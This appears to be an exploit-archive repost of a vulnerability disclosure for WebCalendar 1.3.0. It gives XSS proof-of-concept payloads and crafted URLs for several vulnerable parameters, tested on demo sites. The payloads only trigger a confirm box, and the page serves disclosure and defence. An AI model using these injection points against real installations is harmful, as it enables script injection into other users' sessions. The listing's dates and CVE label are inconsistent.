Advertisement






WebCalendar 1.3.0 Cross Site Scripting

CVE Category Price Severity
CVE-2017-16514 CWE-79 $500 High
Author Risk Exploitation Type Date
Jamal Alshehri High Remote 2024-01-03
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024010011

Below is a copy:

WebCalendar 1.3.0 Cross Site Scripting
# Exploit Title: WebCalendar  Version: 1.3.0 - Stored XSS - Reflected XSS 
# Date: 2024-3-1
# Exploit Author: tmrswrr
# Vendor Homepage: http://www.k5n.us/webcalendar.php
# Version: 1.3.0
# Tested on: https://www.softaculous.com/apps/calendars/WebCalendar

## Stored XSS

1 ) Write Events > Add New Events > Brief Description : https://demos2.softaculous.com/WebCalendarvqsmnseug2/edit_entry.php?year=2024&month=01&day=03    
    this payload : <sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will bee alert button : https://demos2.softaculous.com/WebCalendarvqsmnseug2/month.php


=============================================================================================

## Reflected XSS

1 ) Go to this url and write payload : https://demos2.softaculous.com/WebCalendarvqsmnseug2/colors.php?color="><sVg/onLy=1 onLoaD=confirm(1)//   
    Payload : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will be see alert button 


==============================================================================================

## Reflected XSS

1 ) Go to this url and write payload users parameter : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/availability.php?users=admin&form=editentryform&year=2024&month=1&day=3
    Payload : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will be see alert button : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/availability.php?users=%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//&form=editentryform&year=2024&month=1&day=3

==============================================================================================

## Reflected XSS

1 ) Go to this url and write payload fday parameter : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/datesel.php?form=editentryform&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year%27&date=20240201
    Payload : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will be see alert button : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/datesel.php?form=editentryform&fday=%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//&fmonth=rpt_month&fyear=rpt_year%27&date=20240201


===============================================================================================
















Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.